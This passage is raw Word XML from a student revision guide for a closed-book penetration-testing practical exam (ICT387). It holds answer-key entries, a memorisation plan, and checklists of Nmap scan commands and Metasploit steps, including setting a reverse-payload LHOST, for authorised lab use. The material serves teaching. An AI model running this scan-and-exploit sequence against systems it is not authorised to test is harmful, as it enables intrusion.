      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="89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Exploit uses a weakness; payload is code/action executed after successful exploitation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="89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RHOSTS = lab target IP; LHOST = Kali address receiving a reverse connection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="89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show payloads while an exploit module is selected.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="89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Checks vulnerability/preconditions where module supports it; not available for every exploit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="89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-p = payload; -f = format; -o = output filename.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="89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The memory returned by malloc lives on heap; a local pointer variable often lives on stack.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="89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strcpy can write beyond destination if source is longer than allocated space.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="89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The copy needs 8 characters plus the NUL terminator = 9 bytes total.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="89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ASLR randomises addresses; NX blocks execution in marked data pages; canary detects some stack overwrite damage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="89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24 bytes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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8659B"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="89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Before going to the next question — the practical is sequential, no returning.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Prioritised memorisation plan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>First 20 minutes: write from memory the 12 cover-page commands and the four network/Metasploit IP options.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>Next 20 minutes: on an authorised VM, perform one discovery → Nmap → service interpretation → Metasploit search cycle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>Next 20 minutes: classify five short C examples; state the vulnerable line, buffer and mitigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>Last 10 minutes: cover the answer key and retest the questions you missed; repeat until you can answer rapidly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>10  FINAL ONE-PAGE MEMORY SHEET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EAF2F8"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:start w:w="130" w:type="dxa"/>
              <w:bottom w:w="110" w:type="dxa"/>
              <w:end w:w="130" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="18659B"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>THE FOUR STAGES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DISCOVER → SCAN → VERIFY → EXPLOIT (only in your authorised lab). Keep evidence: target IP, port, version, module and result.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Terminal checklist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EFF4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MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>ip -br a                              # Kali IP/interface</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>ip route                               # connected subnet</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>sudo nmap -sn &lt;LAB_SUBNET&gt;/24           # live hosts</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>sudo nmap -sS -p- &lt;TARGET_IP&gt;           # all TCP ports</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>sudo nmap -sV -sC -p &lt;PORTS&gt; &lt;TARGET_IP&gt; # services/scripts</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>sudo nmap -O &lt;TARGET_IP&gt;               # OS guess</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>nmap -Pn -p 80,443 &lt;TARGET_IP&gt;         # if host discovery fails</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit checklist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EFF4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MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>msfconsole</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>search &lt;SERVICE_OR_CVE&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>info &lt;MODULE_PATH&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>use &lt;MODULE_PATH&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>show options</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>set RHOSTS &lt;TARGET_IP&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>set RPORT &lt;PORT&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>show payloads</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>set PAYLOAD &lt;PAYLOAD&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>set LHOST &lt;KALI_IP&gt;          # for reverse payload</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>set LPORT 4444               # if required</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>check                        # when supported</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>run</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Six exam-ready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3"/>
        <w:gridCol w:w="6926"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4845"/>
            <w:shd w:fill="183F6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Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4845"/>
            <w:shd w:fill="183F6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One-line definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Port scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="692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Discovers port states and accessible network services.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Vulnerability scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="692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Checks for likely security weaknesses.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Penetration test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="692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Controlled validation of whether a weakness can be exploited.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Exploit / payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="692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Exploit triggers weakness / payload performs resulting action.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Stack / heap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="692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shd w:fill="F4F8FB"/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Automatic function storage / dynamic allocation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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18659B"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>Buffer overflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="692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bottom w:val="single" w:sz="4" w:color="DCE4EB"/>
            </w:tcBorders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Out-of-bounds write corrupting memory.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shd w:fill="FFF6E4"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:start w:w="130" w:type="dxa"/>
              <w:bottom w:w="110" w:type="dxa"/>
              <w:end w:w="130" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="18659B"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>LAST-MINUTE MISTAKES TO AVOID</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>-sn is NOT -Pn; -p- is NOT -p 1-1000; RHOSTS is the TARGET and LHOST is KALI; finding an open port is NOT proof of a CVE; a buffer’s capacity must account for the NUL terminator.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Sources &amp; limits</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SmallCaption"/>
      </w:pPr>
      <w:r>
        <w:t>Exam scope: lecturer’s “ICT387 – Hints and Tips for Prac Exam” (2 pages). Commands extend the handout; they are not a prediction of exact exam targets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SmallCaption"/>
      </w:pPr>
      <w:r>
        <w:t>Command references: Nmap manual (nmap.org/book/man.html); Metasploit modules and msfvenom guides (docs.metasploit.com/docs/using-metasploit/basics/). Only test systems you are authorised to assess.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94" w:right="1109" w:bottom="1008" w:left="1109" w:header="461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Caption"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:t xml:space="preserve">Authorised lab practice only  •  ICT387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Caption"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:color w:val="18659B"/>
        <w:sz w:val="14"/>
      </w:rPr>
      <w:t>ICT387  /  PRACTICAL EXAM REVISION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1" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
      <w:color w:val="1D2B3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F4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8659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007477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20"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi" w:ascii="Aptos Display" w:hAnsi="Aptos Display"/>
      <w:b/>
      <w:color w:val="182F4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noBlock">
    <w:name w:val="MonoBlock"/>
    <w:pPr>
      <w:spacing w:before="20" w:after="20" w:line="252" w:lineRule="auto"/>
      <w:ind w:left="173"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="182F47"/>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Compact">
    <w:name w:val="Compact"/>
    <w:pPr>
      <w:spacing w:after="60"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
      <w:color w:val="1D2B39"/>
      <w:sz w:val="17"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="SmallCaption">
    <w:name w:val="SmallCaption"/>
    <w:pPr>
      <w:spacing w:after="80"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
      <w:color w:val="566674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ICT387 Black-Box Practical Exam Revision Guide</dc:title>
  <dc:subject>Closed-book Kali Linux, Nmap, Metasploit, buffer overflow revision</dc:subject>
  <dc:creator>Study revision resource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